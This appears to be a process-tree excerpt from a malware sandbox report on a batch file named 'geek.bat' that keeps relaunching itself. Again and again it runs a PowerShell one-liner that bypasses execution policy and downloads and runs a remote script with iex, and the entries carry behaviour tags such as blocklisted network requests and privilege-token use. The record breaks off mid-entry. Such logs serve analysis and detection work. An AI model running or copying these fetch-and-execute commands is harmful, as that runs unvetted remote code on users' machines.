        PID:4872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        18⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        18⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        19⤵
        
        PID:3260
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        20⤵
        
        PID:4640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        20⤵
        
        PID:4964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        20⤵
        
        PID:3644
        
        C:\Windows\system32\chcp.com
        
        chcp
        21⤵
        
        PID:220
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:1800
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        20⤵
        
        PID:2568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        20⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        20⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        21⤵
        
        PID:3552
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        22⤵
        
        PID:4264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        22⤵
        
        PID:3168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        22⤵
        
        PID:3432
        
        C:\Windows\system32\chcp.com
        
        chcp
        23⤵
        
        PID:4420
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:2980
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        22⤵
        
        PID:3580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        22⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        22⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        22⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        23⤵
        
        PID:4588
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        24⤵
        
        PID:4496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        24⤵
        
        PID:3016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        24⤵
        
        PID:1812
        
        C:\Windows\system32\chcp.com
        
        chcp
        25⤵
        
        PID:628
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:4384
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        24⤵
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        24⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        24⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        24⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        25⤵
        
        PID:684
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        26⤵
        
        PID:2928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        26⤵
        
        PID:1268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        26⤵
        
        PID:1644
        
        C:\Windows\system32\chcp.com
        
        chcp
        27⤵
        
        PID:4484
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:2500
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        26⤵
        
        PID:216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        26⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        26⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        26⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        27⤵
        
        PID:4776
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        28⤵
        
        PID:3008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        28⤵
        
        PID:4400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        28⤵
        
        PID:3612
        
        C:\Windows\system32\chcp.com
        
        chcp
        29⤵
        
        PID:1052
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:3996
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        28⤵
        
        PID:4236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        28⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        28⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        28⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        29⤵
        
        PID:1692
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        30⤵
        
        PID:2728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        30⤵
        
        PID:3392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        30⤵
        
        PID:1016
        
        C:\Windows\system32\chcp.com
        
        chcp
        31⤵
        
        PID:1800
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:1776
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        30⤵
        
        PID:4444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        30⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        30⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        30⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        31⤵
        
        PID:396
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        32⤵
        
        PID:316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        32⤵
        
        PID:1224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        32⤵
        
        PID:1148
        
        C:\Windows\system32\chcp.com
        
        chcp
        33⤵
        
        PID:4416
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:2980
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        32⤵
        
        PID:4308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        32⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        32⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:5076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        32⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        33⤵
        
        PID:3188
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        34⤵
        
        PID:5100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        34⤵
        
        PID:1812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        34⤵
        
        PID:3552
        
        C:\Windows\system32\chcp.com
        
        chcp
        35⤵
        
        PID:4972
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        34⤵
        
        PID:3288
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        34⤵
        
        PID:1384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        34⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        34⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        34⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        35⤵
        
        PID:3148
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        36⤵
        
        PID:1848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        36⤵
        
        PID:5052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        36⤵
        
        PID:4336
        
        C:\Windows\system32\chcp.com
        
        chcp
        37⤵
        
        PID:3984
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        36⤵
        
        PID:1428
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        36⤵
        
        PID:1644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        36⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        36⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        36⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        37⤵
        
        PID:3656
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        38⤵
        
        PID:812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        38⤵
        
        PID:1616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        38⤵
        
        PID:1120
        
        C:\Windows\system32\chcp.com
        
        chcp
        39⤵
        
        PID:684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        38⤵
        
        PID:4400
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        38⤵
        
        PID:4424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        38⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        38⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        38⤵
        
        PID:2092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        39⤵
        
        PID:4640
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        40⤵
        
        PID:1780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        40⤵
        
        PID:3120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        40⤵
        
        PID:3540
        
        C:\Windows\system32\chcp.com
        
        chcp
        41⤵
        
        PID:744
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        40⤵
        
        PID:4776
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        40⤵
        
        PID:1996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        40⤵
        
        PID:4756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        40⤵
        Blocklisted process makes network request
        
        PID:4880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        40⤵
        
        PID:3024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        41⤵
        
        PID:4784
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        42⤵
        
        PID:556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        42⤵
        
        PID:3816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        42⤵
        
        PID:4764
        
        C:\Windows\system32\chcp.com
        
        chcp
        43⤵
        
        PID:4408
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        42⤵
        
        PID:2324
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        42⤵
        
        PID:1596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        42⤵
        
        PID:3616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        42⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        42⤵
        
        PID:392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        43⤵
        
        PID:4400
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        44⤵
        
        PID:3936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        44⤵
        
        PID:3080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        44⤵
        
        PID:1660
        
        C:\Windows\system32\chcp.com
        
        chcp
        45⤵
        
        PID:1196
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        44⤵
        
        PID:2436
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        44⤵
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        44⤵
        Blocklisted process makes network request
        
        PID:4236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        44⤵
        
        PID:3020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        45⤵
        
        PID:2136
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        46⤵
        
        PID:4928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        46⤵
        
        PID:4464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        46⤵
        
        PID:4164
        
        C:\Windows\system32\chcp.com
        
        chcp
        47⤵
        
        PID:644
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        46⤵
        
        PID:5044
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        46⤵
        
        PID:3876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        46⤵
        
        PID:2276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        46⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        46⤵
        
        PID:2468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        47⤵
        
        PID:2324
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        48⤵
        
        PID:1748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        48⤵
        
        PID:4124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        48⤵
        
        PID:2716
        
        C:\Windows\system32\chcp.com
        
        chcp
        49⤵
        
        PID:5004
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        48⤵
        
        PID:940
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        48⤵
        
        PID:4552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        48⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        48⤵
        
        PID:4672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        49⤵
        
        PID:3372
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        50⤵
        
        PID:116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        50⤵
        
        PID:4244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        50⤵
        
        PID:2688
        
        C:\Windows\system32\chcp.com
        
        chcp
        51⤵
        
        PID:448
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        50⤵
        
        PID:4860
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        50⤵
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        50⤵
        
        PID:3324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        50⤵
        Blocklisted process makes network request
        
        PID:3656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        50⤵
        
        PID:3868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        51⤵
        
        PID:2116
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        52⤵
        
        PID:1192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        52⤵
        
        PID:3600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        52⤵
        
        PID:4444
        
        C:\Windows\system32\chcp.com
        
        chcp
        53⤵
        
        PID:4520
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        52⤵
        
        PID:984
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        52⤵
        
        PID:4484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        52⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:2844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        52⤵
        
        PID:3624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        53⤵
        
        PID:2120
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        54⤵
        
        PID:1276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        54⤵
        
        PID:4028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        54⤵
        
        PID:4984
        
        C:\Windows\system32\chcp.com
        
        chcp
        55⤵
        
        PID:4420
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        54⤵
        
        PID:1416
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        54⤵
        
        PID:4256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        54⤵
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        54⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
